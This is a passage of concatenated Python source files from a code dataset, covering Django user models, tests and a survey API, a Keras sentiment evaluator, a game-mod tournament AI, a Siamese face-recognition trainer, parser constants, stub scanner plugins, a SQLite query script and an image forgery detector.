models.BooleanField(default=False)\n is_staff = models.BooleanField(default=False)\n is_active = models.BooleanField(default=False)\n date_joined = models.DateTimeField(default=datetime.datetime.utcnow)\n first_name = models.CharField(max_length=200)\n last_name = models.CharField(max_length=200)\n\n date_last_pass_sent = models.DateTimeField()\n\n # Use UserManager to get the create_user method, etc.\n objects = MyUserManager()\n USERNAME_FIELD = 'email'\n\n @property\n def devtools_available(self):\n return self.is_superuser\n\n class Meta:\n db_table = 'auth_user'\n app_label = settings.MODULE\n\n def get_full_name(self):\n # The user is identified by their email address\n return self.email\n\n def get_short_name(self):\n # The user is identified by their email address\n return self.email\n\n def has_perm(self, perm, obj=None):\n \"Does the user have a specific permission?\"\n if self.is_superuser: return True\n\n # News\n if perm==\"news.add\": return True\n elif perm==\"news.edit\": return False\n elif perm==\"news.delete\": return False\n\n # Articles\n #elif perm==\"article.edit\": return False\n elif perm==\"article.add_revision\": return False\n elif perm==\"article.accept_revision\": return False # But it's verified later\n\n # Site actions\n elif perm==\"format.preview\": 
return self.is_authenticated()\n elif perm==\"site.clear_cache\": return self.is_superuser\n\n return False\n\n def has_module_perms(self, app_label):\n \"Does the user have permissions to view the app `app_label`?\"\n # Simplest possible answer: Yes, always\n return self.is_superuser\n\n def __unicode__(self):\n if self.first_name:\n return self.first_name\n else:\n return self.email\n #return \"{}\".format(self.first_name)\n\n#def create_custom_user(sender, instance, created, **kwargs):\n# if created:\n# values = {}\n# for field in sender._meta.local_fields:\n# values[field.attname] = getattr(instance, field.attname)\n# user = CustomUser(**values)\n# user.save()\n#\n#post_save.connect(create_custom_user, User)\n#admin.site.register(CustomUser, MyUserAdmin)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"617439591","text":"from django.test import TestCase\nfrom users.models import Picture, Profile, Comment\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nimport time, re\n\nclass TestPostComment(TestCase):\n\n def setUp(self): \n #create the user who will post the picture\n self.pictureUser = User.objects.create_user('bob')\n self.pictureUser.save()\n\n #create users who will comment on the picture\n self.comment1User = User.objects.create_user('joe')\n self.comment1User.save()\n self.comment2User = User.objects.create_user('billy')\n self.comment2User.save()\n self.comment3User = User.objects.create_user('mary')\n self.comment3User.save()\n\n #Create reference to pic we want to upload\n self.pic = 'media/italy-landscape.png'\n\n #create reference times\n self.pictureUploadTime = timezone.now()\n time.sleep(0.5)\n self.commentTime = timezone.now()\n\n #Create the picture to be posted\n self.validPicture = Picture.objects.create(\n owner=self.pictureUser,\n picture_object=self.pic,\n post_date=self.pictureUploadTime\n )\n\n #create the text to be added to the comment\n self.commentText = \"Wow bob, thats so funny. AhaHA! 
Love Joe <3\"\n\n #create the first comment\n self.comment1 = Comment.objects.create(\n picture = self.validPicture,\n author = self.comment1User,\n text = self.commentText,\n created_date = self.commentTime,\n approved_comment = True\n )\n\n #create a second comment\n self.comment2 = Comment.objects.create(\n picture = self.validPicture,\n author = self.comment2User,\n text = self.commentText,\n created_date = self.commentTime,\n approved_comment = True\n )\n\n #create a third comment\n self.comment3 = Comment.objects.create(\n picture = self.validPicture,\n author = self.comment3User,\n text = self.commentText,\n created_date = self.commentTime,\n approved_comment = True\n )\n\n #test if the comment text matches and it was uploaded at the correct time\n def test_post_comment(self):\n self.assertEquals(self.comment1.text, self.commentText)\n self.assertEquals(self.comment1.created_date, self.commentTime)\n self.assertNotEquals(self.comment1.text, \"\")\n self.assertNotEquals(self.comment1.text, None)\n\n #test if all three comments exist\n def test_comment_count(self):\n comments = Comment.objects.filter(picture = self.validPicture)\n self.assertEquals(len(comments), 3)\n\n #now we check to see if the comment is actually in the picture\n def test_check_comment_on_photo(self):\n\n #get the comments on the picture\n comments = Comment.objects.filter(picture = self.validPicture)\n\n #now for each comment in the list of comments, we extract the comment itself\n #and assert if it does not match the correct commentText\n for unfilteredComment in comments:\n #we can split on the '-' since we know they wont be present\n #in the comments made for the test\n filteredComment = unfilteredComment.text.split('-')\n self.assertEquals(filteredComment[0], self.commentText)\n\n\n\n","sub_path":"SlightlyDelayedGram/tests/tests_Comments.py","file_name":"tests_Comments.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"244633345","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 22 14:49:19 2020\r\n\r\n@author: huuui\r\n\"\"\"\r\nfrom dataread import Read_data\r\nfrom keras.preprocessing import sequence\r\nimport keras.backend as K\r\nimport numpy as np\r\nimport copy \r\n\r\nclass evaluate:\r\n def __init__(self, aspect, golden, test_review, vocab,model):\r\n self.aspect = aspect\r\n self.golden = golden\r\n self.test_review = test_review\r\n self.vocab = vocab\r\n self.model = model\r\n \r\n \r\n def sentiment_accuracy(self, boundary = 0.5):\r\n aspect_review = []\r\n aspect_polarity = []\r\n for i in range(len(self.test_review)):\r\n if self.aspect in self.golden[i]:\r\n if self.golden[i][self.aspect] == 'positive' or self.golden[i][self.aspect] == 'negative':\r\n aspect_review.append(self.test_review[i])\r\n aspect_polarity.append(self.golden[i][self.aspect])\r\n \r\n test_r1, test_r2 = Read_data({self.aspect:aspect_review}, self.aspect,self.vocab,stopword=True).sentence_convert() \r\n test_train_x = sequence.pad_sequences(test_r1, maxlen= self.model.layers[0].output.get_shape()[1])\r\n class_output_model=K.function([self.model.get_layer('sentence_input').input],[self.model.get_layer('class').output])\r\n probability_test=np.asarray(class_output_model([test_train_x])) \r\n predict_label=[]\r\n for i in range(probability_test[0].shape[0]):\r\n if probability_test[0][i][0]> boundary:\r\n predict_label.append('positive')\r\n else:\r\n predict_label.append('negative')\r\n \r\n accuracy = 0\r\n for 
i in range(len(predict_label)):\r\n if predict_label[i] == aspect_polarity[i]:\r\n accuracy += 1\r\n TP_pos = 0 \r\n FP_pos = 0\r\n FN_pos = 0\r\n TP_neg = 0 \r\n FP_neg = 0\r\n FN_neg = 0\r\n for i in range(len(predict_label)):\r\n if predict_label[i] == aspect_polarity[i] and predict_label[i] == 'positive': \r\n TP_pos += 1 \r\n elif predict_label[i] != aspect_polarity[i] and predict_label[i] == 'positive':\r\n FP_pos += 1\r\n elif predict_label[i] != aspect_polarity[i] and aspect_polarity[i] == 'positive':\r\n FN_pos += 1\r\n for i in range(len(predict_label)): \r\n if predict_label[i] == aspect_polarity[i] and predict_label[i] == 'negative': \r\n TP_neg += 1 \r\n elif predict_label[i] != aspect_polarity[i] and predict_label[i] == 'negative':\r\n FP_neg += 1\r\n elif predict_label[i] != aspect_polarity[i] and aspect_polarity[i] == 'negative':\r\n FN_neg += 1\r\n \r\n precision_pos = TP_pos/ (TP_pos + FP_pos)\r\n recall_pos = TP_pos / (TP_pos + FN_pos)\r\n precision_neg = TP_neg / (TP_neg + FP_neg )\r\n recall_neg = TP_neg / (TP_neg + FN_neg )\r\n F1_pos = 2*precision_pos*recall_pos / (precision_pos+recall_pos)\r\n F1_neg = 2*precision_neg*recall_neg / (precision_neg+recall_neg)\r\n \r\n return {'accuracy':accuracy/len(predict_label) , 'F1_pos':F1_pos, 'F1_neg':F1_neg}\r\n \r\n def combined_accuracy(self, combined_prediction):\r\n aspect_review = []\r\n aspect_polarity = []\r\n for i in range(len(self.test_review)):\r\n if self.aspect in self.golden[i]:\r\n if self.golden[i][self.aspect] == 'positive' or self.golden[i][self.aspect] == 'negative':\r\n aspect_review.append(self.test_review[i])\r\n aspect_polarity.append(self.golden[i][self.aspect])\r\n \r\n TN_pos = 0\r\n TN_neg = 0 \r\n accuracy = 0\r\n for sentence, polarity in combined_prediction.items():\r\n if sentence in aspect_review and polarity == aspect_polarity[aspect_review.index(sentence)]:\r\n accuracy += 1\r\n if polarity == 'positive':\r\n TN_pos +=1\r\n else:\r\n TN_neg +=1\r\n prediction_polarity = [i for i in combined_prediction.values()]\r\n pos_prediction = prediction_polarity.count('positive')\r\n neg_prediction = prediction_polarity.count('negative')\r\n \r\n pos_true = aspect_polarity.count('positive')\r\n neg_true = aspect_polarity.count('negative')\r\n \r\n output = {'pos':[TN_pos,pos_prediction,pos_true],'neg':[TN_neg,neg_prediction,neg_true]}\r\n return output, [accuracy,len(combined_prediction)]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n","sub_path":"new_eva.py","file_name":"new_eva.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"335030180","text":"# Copyright (c) 2017, DjaoDjin inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport logging\n\nfrom rest_framework import generics, mixins, status\nfrom rest_framework import response as http\n\nfrom ..mixins import ResponseMixin\nfrom ..models import Answer, Question\nfrom .serializers import AnswerSerializer, ResponseSerializer\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass AnswerAPIView(ResponseMixin, mixins.CreateModelMixin,\n                    generics.RetrieveUpdateDestroyAPIView):\n\n    serializer_class = AnswerSerializer\n    lookup_rank_kwarg = 'rank'\n\n    @property\n    def question(self):\n        if not hasattr(self, '_question'):\n            self._question = Question.objects.get(\n                survey=self.sample.survey, rank=self.kwargs.get(\n                    self.lookup_rank_kwarg))\n        return self._question\n\n    def update(self, request, *args, **kwargs):\n        #pylint:disable=unused-argument\n        partial = kwargs.pop('partial', False)\n        serializer = self.get_serializer(data=request.data, partial=partial)\n        serializer.is_valid(raise_exception=True)\n        try:\n            # Update the existing answer when one was already recorded ...\n            serializer.instance = Answer.objects.get(\n                response=self.sample, question=self.question)\n            self.perform_update(serializer)\n        except Answer.DoesNotExist:\n            # ... otherwise create it and answer with 201 instead of 200.\n            self.perform_create(serializer)\n            headers = self.get_success_headers(serializer.data)\n            return http.Response(serializer.data,\n                status=status.HTTP_201_CREATED, headers=headers)\n\n        return http.Response(serializer.data)\n\n    def perform_create(self, serializer):\n        serializer.save(response=self.sample, question=self.question,\n            rank=self.question.rank)\n\n\nclass ResponseAPIView(ResponseMixin, generics.RetrieveUpdateDestroyAPIView):\n\n    serializer_class = ResponseSerializer\n\n    def get_object(self):\n        return self.sample\n","sub_path":"survey/api/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"133251873","text":"# Tournament Play Enhancements (1.1) by Windyplains\n# Released 8/30/2011\n\n# WHAT THIS FILE DOES:\n# Adds \"AI_triggers\" to module_mission_template.py's \"tournament_triggers\" to enable the \"Dynamic Weapon AI\" feature.\n\nfrom header_common import *\nfrom header_operations import *\nfrom module_constants import *\nfrom header_mission_templates import *\n\n\nAI_triggers = [ \n## TOURNAMENT PLAY ENHANCEMENTS (1.0) - Windyplains - Weapon AI\n# If mounted -> equip lance if you have one.\n# If enemy distant -> equip ranged weapon if you have one.\n# If enemy close -> equip melee weapon.\n(0, 0, 1, \n\t[(eq, \"$g_mt_mode\", abm_tournament),],\n\t[\n    # Run through all active NPCs on the tournament battle field.\n    (try_for_agents, \":agent_self\"),\n    # Isn't a player.\n    (agent_is_non_player, \":agent_self\"),\n    # Isn't a horse.\n    (agent_is_human, \":agent_self\"),\n    # Hasn't been defeated.\n    (agent_is_alive, \":agent_self\"),\n\t\t# exclude tournament masters\n\t\t(agent_get_troop_id, \":troop_self\", \":agent_self\"),\n\t\t(neg|is_between, \":troop_self\", \"trp_town_1_arena_master\", \"trp_town_1_armorer\"),\n    # Are they riding a 
horse?\n\t\t(agent_get_horse, \":horse\", \":agent_self\"), # 0 - No, 1 - Yes\n\t\t\n\t\t# Determine closest enemy.\n\t\t(assign, \":shortest_distance\", 10000),\n\t\t(str_store_string, s1, \"@No one\"),\n\t\t(str_store_troop_name, s2, \":troop_self\"),\n\t\t(agent_get_position, pos1, \":agent_self\"),\n\t\t(assign, \":distance\", 10000),\n\t\t(try_for_agents, \":agent_enemy\"),\n\t\t\t(agent_get_troop_id, \":troop_enemy\", \":agent_enemy\"),\n\t\t\t# Not looking at self.\n\t\t\t(neq, \":agent_enemy\", \":agent_self\"),\n\t\t\t# exclude tournament masters\n\t\t\t(neg|is_between, \":troop_enemy\", \"trp_town_1_arena_master\", \"trp_town_1_armorer\"),\n\t\t\t# Not an ally\n\t\t\t(agent_get_team, \":team_self\", \":agent_self\"),\n\t\t\t(agent_get_team, \":team_enemy\", \":agent_enemy\"),\n\t\t\t(neq, \":team_self\", \":team_enemy\"),\n\t\t\t# Isn't a horse.\n\t\t\t(agent_is_human, \":agent_enemy\"),\n\t\t\t# Hasn't been defeated.\n\t\t\t(agent_is_alive, \":agent_enemy\"),\n\t\t\t\n\t\t\t(agent_get_position, pos2, \":agent_enemy\"),\n\t\t\t(get_distance_between_positions,\":distance\",pos1,pos2),\n\t\t\t(try_begin),\n\t\t\t\t(lt, \":distance\", \":shortest_distance\"),\n\t\t\t\t(assign, \":shortest_distance\", \":distance\"),\n\t\t\t\t(str_store_troop_name, s1, \":troop_enemy\"),\n\t\t\t\t(assign, reg0, \":shortest_distance\"),\n\t\t\t\t(agent_get_horse, \":enemy_mounted\", \":agent_enemy\"),\n\t\t\t(try_end),\n\t\t(try_end),\n\t\t\n\t\t# If you enable this save yourself a headache and up the trigger timing.\n\t\t(try_begin), (eq, wp_tpe_debug, 2), (display_message, \"@DEBUG (Weapon AI): {s2}'s closest enemy is {s1} at a distance of {reg0}.\"), (try_end),\n\t\t\n\t\t(assign, \":weapon_choice\", 0),\n\t\t(try_begin),\n\t\t\t(ge, \":horse\", 0),\n\t\t\t(this_or_next|agent_has_item_equipped,\":agent_self\",wp_tpe_normal_lance),\n\t\t\t(agent_has_item_equipped,\":agent_self\",wp_tpe_enhanced_lance),\n\t\t\t(assign, \":weapon_choice\", 2), # Bypasses melee/ranged options.\n\t\t(else_try),\n\t\t\t(le, \":enemy_mounted\", 0),\n\t\t\t(le, \":shortest_distance\", wp_tpe_enemy_approaching_foot),\n\t\t\t(assign, \":weapon_choice\", 1),\n\t\t(else_try),\n\t\t\t(ge, \":enemy_mounted\", 1),\n\t\t\t(le, \":shortest_distance\", wp_tpe_enemy_approaching_mounted),\n\t\t\t(assign, \":weapon_choice\", 1),\n\t\t(try_end),\n\t\t\n\t\t(try_begin),\n\t\t\t(eq, \":weapon_choice\", 1),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_polearm),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_polearm),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_sword),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_sword),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_greatsword),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_greatsword),\n\t\t(else_try),\n\t\t\t(eq, \":weapon_choice\", 0),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_bow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_bow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_crossbow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_crossbow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_javelin),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_javelin),\n\t\t(else_try),\n\t\t\t(eq, \":weapon_choice\", 2),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_lance),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_lance),\n\t\t(try_end),\n 
(try_end),\n ]),\n \n(0, 0, ti_once, \n\t[(eq, \"$g_mt_mode\", abm_tournament),],\n\t[\n\t\t# Run through all active NPCs on the tournament battle field.\n\t\t(try_for_agents, \":agent_self\"),\n\t\t\t(agent_equip_item, \":agent_self\", wp_tpe_normal_boots),\n\t\t\t(agent_equip_item, \":agent_self\", wp_tpe_enhanced_boots),\n\t\t(try_end),\n\t]),\n## TOURNAMENT PLAY ENHANCEMENTS end\n]\n\ndef modmerge_mission_templates(orig_mission_templates):\n\tfind_i = find_object( orig_mission_templates, \"arena_melee_fight\" )\n\torig_mission_templates[find_i][5].extend(AI_triggers)\n\n# Used by modmerger framework version >= 200 to merge stuff\n# This function will be looked for and called by modmerger if this mod is active\n# Do not rename the function, though you can insert your own merging calls where indicated\ndef modmerge(var_set):\n try:\n var_name_1 = \"mission_templates\"\n orig_mission_templates = var_set[var_name_1]\n modmerge_mission_templates(orig_mission_templates)\n\n except KeyError:\n errstring = \"Variable set does not contain expected variable: \\\"%s\\\".\" % var_name_1\n raise ValueError(errstring)","sub_path":"source/tournament_mission_templates.py","file_name":"tournament_mission_templates.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"428563064","text":"from facialrec.build_resnet import resnet50\nfrom facialrec import utils\nfrom facialrec import config\nimport make_image_pairs\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Lambda\n\n# loading data\nprint('[Data] Loading the dataset.')\ntrainX, testX, trainY, testY = make_image_pairs.loadData('small_lfw')\nprint('[Data] Making the training samples.')\ntrainPair, trainLabel = make_image_pairs.make_pairs(trainX,trainY)\nprint('[Data] Done!')\nprint('[Data] Making the testing samples.')\ntestPair, testLabel = make_image_pairs.make_pairs(testX,testY)\ntrainPair = trainPair[:280]\ntrainLabel = trainLabel[:280]\ntestPair = testPair[:120]\ntestLabel = testLabel[:120]\n\nprint('[Data] Done!')\n\n\n# building the network\nprint('[Build] Building network architecture.')\nimgA = Input(shape=config.IMG_SHAPE)\nimgB = Input(shape=config.IMG_SHAPE)\n\nfeatureExtractor = resnet50(config.IMG_SHAPE)\nfeatsA = featureExtractor(imgA)\nfeatsB = featureExtractor(imgB)\ndistance = Lambda(utils.euclidean_distance)([featsA, featsB])\noutputs = Dense(1, activation=\"sigmoid\")(distance)\nmodel = Model(inputs=[imgA, imgB], outputs=outputs)\n\n# compile the model\nprint(\"[INFO] compiling model...\")\nopt = tf.keras.optimizers.SGD(learning_rate=0.1)\nmodel.compile(loss=\"binary_crossentropy\", optimizer='Adam',\n\tmetrics=[\"accuracy\"])\n\n# train the model\nprint(\"[INFO] training model...\")\n# setting up tensorboard\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=config.LOG_PATH, histogram_freq=1)\n\nhistory = model.fit(\n [trainPair[:, 0], trainPair[:, 1]], trainLabel[:],\n validation_data=([testPair[:, 0], testPair[:, 1]], testLabel[:]),\n callbacks= [tensorboard_callback],\n batch_size=config.BATCH_SIZE,\n epochs=config.EPOCHS)\n# serialize the model to disk\nprint(\"[INFO] saving siamese model...\")\nmodel.save(config.MODEL_PATH)\n# plot the training history\nprint(\"[INFO] plotting training history...\")\nutils.plot_training(history, 
config.PLOT_PATH)","sub_path":"train_res.py","file_name":"train_res.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"491319270","text":"ACTION=0\nTOP12_STACK=1\nSAME_SENT=2\nSAME_PARA=3\nNOT_PRESENT=4\nSTACK_QUEUE=5\nTOP_1=6\nSENT_START=7\nSENT_END=8\nPARA_START=9\nPARA_END=10\nDOC_START=11\nDOC_END=12\nTOP_2=13\nQUEUE=14\nQUEUE_1=15\nRIGHT_DEP=16\nDEP_RELATION=17\nLEFT_DEP=18\nNO_DEP=19\nNO_PRESENT_DEP=20\nTOP1_STACK=21\nTOP2_STACK=22\nFIRST_QUEUE=23\nFORM=24\nDIST_TO_SENT_BEGIN=25\nDIST_TO_SENT_END=26\nDIST_TO_PARA_BEGIN=27\nDIST_TO_PARA_END=28\nDIST_TO_DOC_BEGIN=29\nDIST_TO_DOC_END=30\nNOT_PRESENT_NUM_2=31\nTOP12_QUEUE=32\nTOP12_STACK_QUEUE=33\nEDU_COMPARISON=34\nSENT_CONTINUE=35\nPARA_CONTINUE=36\nN_EDUS=37\nN_SENTS=38\nTOP1_STACK_NUM_CAT=39\nTOP2_STACK_NUM_CAT=40\nSENT_COMPARISON=41\nTOP_STACK=42\nTOP_STACK_NUM_CAT=43\nNOT_PRESENT_NUM_6=44\nSTACK=45\nNUCLEUS_FEAT=46\nNUC_EDU_HEAD_WORD=47\nNUC_EDU_HEAD_DEP=48\nNUC_EDU_DEP_WORD=49\nNOT_PRESENT_DEP=50\nYELP = \"yelp\"\nRST = \"rst\"\nINSTR = \"instr\"\nDATASET_TYPE = \"dataset_type\"\nEDU_DIM = \"edu_dim\"\nDEVICE = \"device\"\nUSE_RNN = \"use_rnn\"\nUSE_BERT = \"use_bert\"\nUSE_DEV = \"use_dev\"\nLR = \"lr\"\nNUM_OUT_LAYERS = \"num_out_layers\"\nUSE_ATTENTION = \"use_attention\"\nHIDDEN_DIM = \"hidden_dim\"\nTFMER_N_LAYERS = \"tfmer_n_layers\"\nW_DECAY = \"weight_decay\"\nUSE_STACK = \"use_stack\"\nDO_ONLINE= \"do_online\"\nUSE_TUNE= \"use_tune\"\nZERO_PADS= \"zero_pads\"\nBATCH_SIZE=\"batch_size\"\nKEEP_BOUNDARIES=\"keep_boundaries\"\nSTATUS_FEATS=\"status_features\"\nOP_FEATS=\"op_feats\"\nORG_FEATS=\"org_feats\"\nSYNT_FEATS=\"synt_feats\"\nSTRUCT_FEATS=\"struct_feats\"\nLENGTH_FEATS=\"length_feats\"\nNUC_FEATS=\"nuc_feats\"\nDO_COREF=\"do_coref\"\nMODEL_NAME=\"model_name\"\nMODEL_TYPE=\"model_type\"\nEPOCH_START=\"epoch_start\"\nPRETRAINED_COREF_PATH=\"pretrained_coref_path\"","sub_path":"src/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"26850521","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport time\n\nfrom minion.plugin_api import BlockingPlugin\n\nclass DelayedPlugin(BlockingPlugin):\n def do_run(self):\n for n in range(0,10):\n if self.stopped:\n return\n time.sleep(1)\n message = self.configuration.get('message', 'Hello, world')\n self.report_issues([{ \"Summary\":message, \"Severity\":\"Info\" }])\n\nclass FailingPlugin(BlockingPlugin):\n def do_run(self):\n raise Exception(\"Failing plugins gonna fail\")\n","sub_path":"plugin-service/minion/plugins/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70940094","text":"import pandas as pd\r\nimport sqlite3\r\n\r\ndf = pd.read_csv('buddymove_holidayiq.csv')\r\nconn = sqlite3.connect('buddymove_holidayiq.sqlite3')\r\ndf.to_sql(\"buddymove\", con=conn)\r\n\r\n# How many rows do we have? 
(should be 249)\r\nrow_query = '''\r\nSELECT\r\n count('User Id') as NumUsers\r\nFROM buddymove\r\n'''\r\ntotal_rows = conn.execute(row_query).fetchone()\r\nprint(\"Total # of rows\", total_rows)\r\n\r\n# How many users reviewed at least 100 nature and 100 shopping?\r\n\r\nreview_query = '''\r\nSELECT\r\n\tcount('User Id')\r\nFROM buddymove\r\nWHERE Nature >= 100 and Shopping >= 100\r\n'''\r\nreview_users = conn.execute(review_query).fetchone()\r\nprint(\"Amount of users who reviewed 100 nature and shopping category\", review_users)\r\n","sub_path":"module1-introduction-to-sql/buddymove_holidayiq.py","file_name":"buddymove_holidayiq.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486346780","text":"from datetime import datetime\nfrom skimage.feature import blob_dog\nfrom math import sqrt\nimport cv2\nimport numpy as np\nimport scipy\nfrom scipy import ndimage\nfrom scipy.spatial import distance\nimport glob, os\nfrom PIL import Image\nimport requests\nimport urllib.request\nimport requests, io\nimport matplotlib.pyplot as plt \n\n# Initiate BRISK detector\nbrisk = cv2.BRISK_create(27)\n# create BFMatcher object\nmatcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_BRUTEFORCE_HAMMING)\n\n\ndef sobel_f(im1):\n\timage =im1.astype (int)\n\t# derivatives\n\tdx=ndimage.sobel(image, 1)\n\tdy=ndimage.sobel(image, 0)\n\tmag=np.hypot(dx, dy)\n\t# normalization\n\tmag*= 255.0 / np.max(mag)\n\tsobel_im1 = np.uint8(mag)\n\treturn sobel_im1\n\n#DoG\ndef dog_f(im1_gray):\n\tblobs_dog = blob_dog(im1_gray, max_sigma=40, threshold=.1)\n\tblobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)\n\treturn blobs_dog\n\n#Blobs\ndef show_f(blobs_all):\n\tblob_area =[]\n\tblobs_list = [blobs_all]\n\tfor blobs in blobs_list:\n\t\tfor blob in blobs:\n\t\t\ty, x, r = blob\n\t\t\tarea = [y,x,r] \n\t\t\tif 2*r > 1:\n\t\t\t\t#print area\n\t\t\t\tblob_area.append(area) \n\treturn blob_area\n\nasync def forgery_detect(image_urls):\n\ti = 0\n\tflag=0\n\timages = []\n\timage_urls_items = image_urls.items()\n\tfor key,value in image_urls_items:\n\t\tif (value != \"\"):\n\t\t\timages.append(value)\n\t# \tresp = urllib.request.urlopen(value)\n\t# \tprint(resp)\n\n\t# \tif (value != \"\"):\n\t# \t\tprint(value)\n\t# \t\tresp = urllib.request.urlopen(value)\n\t# print (resp)\n\t\n\tfor im in images:\n\t\tstart_time = datetime.now()\n\t\t#print('time :',start_time)\n\t\t# resp = urllib.request.urlopen(im)\n\t\t# print(resp)\n\t\t# im1 = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n\t\tresponse = requests.get(im).content\n\t\tim1 = plt.imread(io.BytesIO(response), format='JPG')\n\t\tplt.imshow(im1)\n\t\tsobel = sobel_f(im1)\n\t\tsobel_gray =cv2.cvtColor(sobel, cv2.COLOR_BGR2GRAY)\n\t\tim2_gray =cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\t\tblobs_all = dog_f(sobel_gray)\n\t\toutput = show_f(blobs_all)\n\t\tclone1 = im1.copy()\n\t\tkey,des = brisk.detectAndCompute(im2_gray, None)\n\t\tprint(len(key),'...',len(des))\n \n\t\tll =[]\n\t\tfor b0 in range(0,len(output)):\n\t\t\tb0y,b0x,b0r = output[b0]\n\t\t\tcv2.circle(clone1, (int(b0x),int(b0y)), int(b0r), (0, 0, 200), 1) \n\t\t\tl =[]\n\t\t\tkp_1 =[]\n\t\t\tds_1 =[]\n\t\t\tl3 =[]\n\t\t\tindex= 0\n\t\t\tfor k,d in zip(key,des):\n\t\t\t\tif (k.pt[0] - b0x)**2 + (k.pt[1] - b0y)**2 <= (b0r **2):\n\t\t\t\t\tl.append(index)\n\t\t\t\t\t#print('l :',len(l))\n\t\t\t\t\tkp_1.append(k)\n\t\t\t\t\tds_1.append(d)\n\t\t\t\tindex+=1\n\t\t\tif l:\n\t\t\t\tkp_2= np.delete(key,l,axis=0)\n\t\t\t\tds_2 = 
